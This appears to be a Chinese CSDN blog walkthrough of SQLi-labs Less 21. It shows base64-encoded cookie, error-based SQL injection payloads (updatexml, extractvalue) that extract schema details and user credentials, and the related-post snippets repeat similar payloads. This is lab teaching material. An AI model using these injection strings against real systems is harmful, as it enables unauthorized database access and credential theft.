SQL-labs的第21关——http请求(Cookie) Base64转码 报错注入

最新推荐文章于 2024-02-20 08:00:00 发布
最新推荐文章于 2024-02-20 08:00:00 发布
阅读量166 收藏
点赞数
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73393033/article/details/131892112
版权
该文章详细描述了通过报错注入方法判断网站的闭合方式,使用)作为闭合符号。接着,通过SQL注入技术,逐步爆破了数据库名、用户名、版本信息、数据表名以及特定表的字段名和字段内容。过程中利用了base64解密和特定的SQL查询语句来获取信息。
摘要由CSDN通过智能技术生成

1、判断闭合方式

我们正常登录,返回页面如下:

我们发现cookie的RHVtYg==很显然是被加密的,我们经提示得知使用base64加密的。

注意使用base64加密时,加密a后,再加密b的结果跟a和b一起同时加密的结果是不一样的。

我们经过解密可知RHVtYg==就是Dumb。

接下来,我们在Dumb的后面加上',然后进行加密,返回页面如下:

发生了报错,我们推测'就是闭合方式,我们再加上一个#,返回页面如下:

仍然报错,说明闭合方式包括',但是不止有'。我们在加上一个)。返回页面如下:

说明闭合方式是:')。

2、判断注入方式

在判断闭合方式时,我们发现该网站会返回错误,说明该网站适合使用报错注入。

3、爆破数据库名、用户名、版本

输入语句

Dumb') and updatexml(1,concat('~',database(),user(),version(),'~'),1)#

,记得加密,返回页面如下:

4、爆破数据表名

输入语句

Dumb') and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~'))#

,进行加密,返回页面如下:

5、爆破字段名

输入语句

Dumb') and extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security')))#

,进行加密,返回页面如下:

6、爆破字段内容

为了防止出现无法显示完全这种情况,我们输入以下语句

Dumb') and updatexml(1,concat('~',(select group_concat(concat(id,'-',username,'-',password)) from users),'~'),1)#

,返回页面如下:

我们发现数据显示不完全,我们将语句改为:

Dumb') and updatexml(1,concat('~',mid((select group_concat(concat(id,'-',username,'-',password)) from users),20,31),'~'),1)#

,返回页面如下:

这样我们就可以看到刚第一次没有显示出来的数据。

到此打靶结束

Hacker-小胖锅
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Sqli-labs靶场第21、22详解[Sqli-labs-less-21、22]自动化注入-SQLmap工具注入|sqlmap跑base64加密
m0_73615178的博客
03-03 1059
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
sqli-labs-php7环境搭建及通记录
weixin_44644249的博客
10-28 1705
sqli-labs-php7环境搭建及通记录 sqli-labs-php7环境搭建及通记录 学了一个星期的sql注入,将学习过程记录在博客,以后可以查看。 学习视频来自b站的up主:crowsec 视频链接:https://space.bilibili.com/29903122 sqli-labs-php7链接:https://github.com/skyblueee/sqli-labs-php7.git 一. 环境搭建及常用工具 Linux环境搭建(我这里用的是kali linux): 1.启动
sql注入21-27
qq_45751902的博客
04-01 3085
21 经过这两个可知,有加密,在网上找大佬的解法说,使用了base64加密 解密后 base64编解码地址: https://tool.oschina.net/encrypt?type=3 可以推出,我们需要在burp suite上将编码后的内容输入 ') and updatexml(1,concat(0x7e,database(),0x7e),1)# ') union select 1,2, updatexml(1,concat(0x7e,database(),0x7e),1)# 同时因为有回
sql注入21-30
Camillewuxie的博客
02-08 188
Less21-30 21题 先登录进去,页面是这样的 这个完全看不懂,然后只能看源代码了, 这个可以看出这为’)闭合方式; 并且为cookie注入, 去看标题cookie injection - base64 encoded - single quotes and parenthesis,然后发现要使用base64编码, base64编码在线加密解密:http://tool.oschina....
sqli-labs21(基于cookiebase64编码的报错盲注)通思路
zyh1588的博客
11-28 681
小白回顾sql靶场21
sql-labs 闯 21~25
qq_44663230的博客
08-29 1352
sql-labs 闯21~25
sqli-labs通笔记
m0_55563900的博客
04-04 4552
32 宽字节注入 正常思路 输入’ " 等等一些特殊符号 输入单引号之后出现了转义,把单引号转义成’,所以要用GBK编码 %df+’ 字段数为3列,然后使用联合查询就可以了
sqli-labs闯记录1-53
weixin_43938446的博客
03-28 347
白冒-红帽-黑冒。从点点滴滴做起
sqli-labs题解
F1rstb100d
10-22 1096
sqli-labs题解
04 渗透测试基础
热门推荐
weixin_43234021的博客
01-04 1万+
渗透测试基础一 代码审计1 基础环境搭建(1) Web服务:WAMP+phpstudy(2) phpstudy2 HTML 表单 一 代码审计 1 基础环境搭建 (1) Web服务:WAMP+phpstudy (2) phpstudy 启动问题 端口正常开放 80 http 3306 mysql web根目录[C:\Users\dq\Documents\phpStudy-1-24\phpStudy\WWW] php 探针 phpinfo.php phpmyadmin Apache配置文件:[
sql-labs 21-40
m0_46143427的博客
02-04 288
Less-23 这不管怎么尝试,都是出现一堆英文 看一下源码,发现 符号 # ,–,空格都被注释掉了。那这样的话以往的联合语句就不能照搬过来用了。 可以采用闭合注入语句。 源码的语句为 可以输入?id=0' union select 1,2,3'。 第一个’(单引号)闭合0,第二个’(单引号)闭合后面的单引号。 这样整个语句就变成了$sql="SELECT * FROM users WHERE...
sqli-labs第二十一详解(这次用sqlmap)
金 帛的博客
05-09 2694
SQL靶场第二十一答案详解,这次用sqlmap跑
SQL 注入漏洞(十三)base64注入
不秃头的程序Yang
06-21 1509
二、代码分析 2、查询敏感信息
Sqllab记录(21~30)白盒测试
m0_56375711的博客
12-06 401
sqllab记录(20~30)白盒测试
SQL-Labs靶场“21-25”教程
最新发布
钟言的博客
02-20 1万+
本篇为SQL-Labs靶场的21到25教程,详细内容包含了、二十一 基于base64编码单引号Cookie注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 、二十二 基于base64编码双引号Cookie注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 二十三 基于GET过滤注释 1、源码分析 2、updatexml报错注入 3、联合查询注入 四、二+四 基于POST存储型二次注入 1、源码分析 2、二次注入 五、二十五 基于GET单引号OR、A等等
SQLi-LABS(21~25a详解)
CTF小白的博客
09-22 3217
目录SQLi-LABS Less-21查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-22查看题目环境测试注入点SQL注入SQLi-LABS Less-23查看题目环境测试注入点SQL注入SQLi-LABS Less-24查看题目环境SQLi-LABS Less-25查看题目环境测试注入点SQL注入SQLi-LABS Less-25...
sqli-liabs学习SQL注入之旅(第二十一~第三十
guanjian_ci的博客
04-23 3077
二十一 打开这一,开屏暴击。报错的大致意思是时区没有设置好,我们进入报错的文件,在php代码中加入中国时区的代码即可: date_default_timezone_set("PRC"); 其实不改这个也不影响我们做题目,只是有错不改看着难受而已,页面正常后,开始正题: 第一步:在账号密码框一顿输出后,发现注入点不在外面,只能登录进入里面看看,看到了页面显示了我们的UA、cookie等信息。有点类似第二十,属于cookie注入!唯一不同的是这一考察了一个加解密运用,cook.
良心SQL注入手工教程(看完血虐sqlilabs全
黑白的博客
11-08 2100
声明 学习SQL注入,不要只会工具,多看一些原理层的东西,提升会很快,想好好学SQL注入的,务必把这一块拿下 正文 在了解SQL注入前,建议先去了解一下SQL的知识,本文中看一先看看附录,那里面有一些SQL的结构和常用的函数(SQL也是一类语言,那当然离不开函数),看完之后,可以开始正文啦,我们这里以sqlilabs的62为例(为什么选62,因为62数据库名不变,表名和字段名,都是随机的,这样我的payload你们只能套用,具体的操作还是需要过过小脑瓜的),就用这一学习SQL注入最难拿下的点,
Sqlilabs-21
KAKA的博客
07-09 628
来到了第 21 ,看着 21 ,我知道,第一阶段快结束了,马上要到…啪…给我认真写博文… 这一卡的题目给内容貌似一点都不符合…还是得从 cookie 下手,但肯定不跟20 一样,通过提交正常的数据,我们可以看到,COOKIE 长的有点不太一样… Base64Decode 解码 YWRtaW4= 得到的结果是 admin,所以说后台将 COOKIE 进行了 Base64 的编码,所以构造 payload 时,应该在 cookie 类似于:[得先正确登入] uname=YWRtaW4nKSBhbm
PHP与Apache环境下部署SQL注入靶场sqli-labs指南
部署sqli-labs是一个实战训练过程,它不仅提供了丰富的SQL注入实例,还能帮助开发者熟悉如何防范此类攻击,是提升网络安全技能的实用工具。通过这个靶场,你将更深入理解Web应用程序安全的重要性,并掌握如何在实际...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hacker-小胖锅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值